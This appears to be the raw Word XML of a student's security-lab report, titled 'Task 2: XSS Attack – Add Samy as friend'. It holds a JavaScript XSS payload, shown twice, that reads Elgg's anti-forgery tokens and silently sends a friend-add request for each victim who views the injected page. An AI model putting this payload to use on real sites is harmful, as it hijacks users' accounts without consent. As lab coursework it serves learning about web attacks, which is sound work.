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0AB05" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Y1939111-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>张思嘉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADCF0E" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00A91209" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sk</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Attack- Add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED500A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00FE7B08" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21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81E55A" wp14:editId="3B4874A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-342900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>444500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6369050" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="12700" b="2159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E2E6A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted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&lt;</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="start-tag"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Style w:val="attribute-name"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>type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="text/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"&gt;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window.onload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= function () {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="51C76DB3" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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0F2C47">
                              <w:rPr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alert('You have added </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr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Samy</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr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 as friend');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Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/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Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
                                <w:b/>
                              </w:rPr>
                              <w:instrText>= 1 \* GB3</w:instrText>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/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Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
                                <w:b/>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>①</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                                <w:b/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6AC85A05" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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ab/>
                              <w:t xml:space="preserve">var Ajax=new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XMLHttpRequest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); </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="23326489" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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ab/>
                              <w:t xml:space="preserve">var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="&amp;__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elgg_ts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="+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elgg.securi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ty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.token.__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elgg_ts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5F4792D7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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ab/>
                              <w:t>var token="&amp;__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elgg_token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="+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elgg.security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.token.__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elgg_token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57D92F5A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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ab/>
                              <w:t xml:space="preserve">//Construct the HTTP request to add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Samy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as a friend. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41FA6317" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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0F2C47">
                              <w:rPr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Var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=47"+ts+token;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F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText>= 2 \* GB3</w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                                <w:noProof/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>②</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3DB84990" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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ab/>
                              <w:t xml:space="preserve">//Create and send Ajax request to add friend </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="61EAFBD7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:tabs>
                                <w:tab w:val="clear" w:pos="916"/>
                                <w:tab w:val="left" w:pos="807"/>
                              </w:tabs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Pr="000F2C47">
                              <w:rPr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 xml:space="preserve">Ajax=new </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr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XMLHttpRequest</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                                <w:highlight w:val="yellow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F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText>= 3 \* GB3</w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                                <w:noProof/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>③</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000F2C47">
                              <w:rPr>
                                <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0ECC61D7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:ind w:left="84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Ajax.open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("GET</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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",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sendurl</w:t>
                            </w:r>
                            <w:proofErr w:type="gram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,true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);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Ajax.setRequestHeader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("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");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Ajax.send</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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51D23CD0" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted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}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0973CAE3" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00A91209" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsi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&lt;/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="end-tag"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>script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81E5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pt;margin-top:35pt;width:50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6CzJQIAAEc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S2mV5QY&#10;plGkRzEE8g4GUkR+eutLDHuwGBgGvEadU63e3gP/7omBTcfMTtw6B30nWIP5TePL7OLpiOMjSN1/&#10;gga/YfsACWhonY7kIR0E0VGn41mbmArHy8XbxTKfo4ujbzrLZ4siqZex8vm5dT58EKBJPFTUofgJ&#10;nh3ufYjpsPI5JP7mQclmK5VKhtvVG+XIgWGjbNNKFbwIU4b0FV3Oi/nIwF8h8rT+BKFlwI5XUlf0&#10;+hzEysjbe9OkfgxMqvGMKStzIjJyN7IYhno4CVNDc0RKHYydjZOIhw7cT0p67OqK+h975gQl6qNB&#10;WZbT2SyOQTJm8yvkkLhLT33pYYYjVEUDJeNxE9LoJMLsLcq3lYnYqPOYySlX7NbE92my4jhc2inq&#10;1/yvnwAAAP//AwBQSwMEFAAGAAgAAAAhAMXvawvfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j0FPwzAMhe9I/IfISFymLV1ZBy1NJ5i0E6eVcc8a01Y0Tkmyrfv3mBOcbOs9PX+v3Ex2EGf0oXek&#10;YLlIQCA1zvTUKji87+ZPIELUZPTgCBVcMcCmur0pdWHchfZ4rmMrOIRCoRV0MY6FlKHp0OqwcCMS&#10;a5/OWx359K00Xl843A4yTZK1tLon/tDpEbcdNl/1ySpYf9cPs7cPM6P9dffqG5uZ7SFT6v5uenkG&#10;EXGKf2b4xWd0qJjp6E5kghgUzLMVd4kKHhOebMhXOS9HBWm+TEFWpfxfofoBAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEAOfegsyUCAABHBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAxe9rC98AAAAKAQAADwAAAAAAAAAAAAAAAAB/BAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="267E2E6A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted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&lt;</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="start-tag"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>script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Style w:val="attribute-name"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>type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="text/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javascript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"&gt;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window.onload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= function () {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="51C76DB3" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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0F2C47">
                        <w:rPr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alert('You have added </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>Samy</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr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 as friend');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Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                          <w:b/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                          <w:b/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
                          <w:b/>
                        </w:rPr>
                        <w:instrText>= 1 \* GB3</w:instrText>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                          <w:b/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                          <w:b/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
                          <w:b/>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>①</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
                          <w:b/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6AC85A05" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                        <w:t xml:space="preserve">var Ajax=new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XMLHttpRequest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); </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="23326489" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                        <w:t xml:space="preserve">var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ts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="&amp;__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elgg_ts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="+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elgg.securi</w:t>
                      </w:r>
                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:bookmarkEnd w:id="1"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>ty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>.token.__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elgg_ts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5F4792D7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                        <w:t>var token="&amp;__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elgg_token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="+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elgg.security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>.token.__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elgg_token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57D92F5A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                        <w:t xml:space="preserve">//Construct the HTTP request to add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Samy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as a friend. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41FA6317" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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0F2C47">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>Var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=47"+ts+token;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0F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText>= 2 \* GB3</w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                          <w:noProof/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>②</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3DB84990" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                        <w:t xml:space="preserve">//Create and send Ajax request to add friend </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="61EAFBD7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:tabs>
                          <w:tab w:val="clear" w:pos="916"/>
                          <w:tab w:val="left" w:pos="807"/>
                        </w:tabs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ab/>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Ajax=new </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
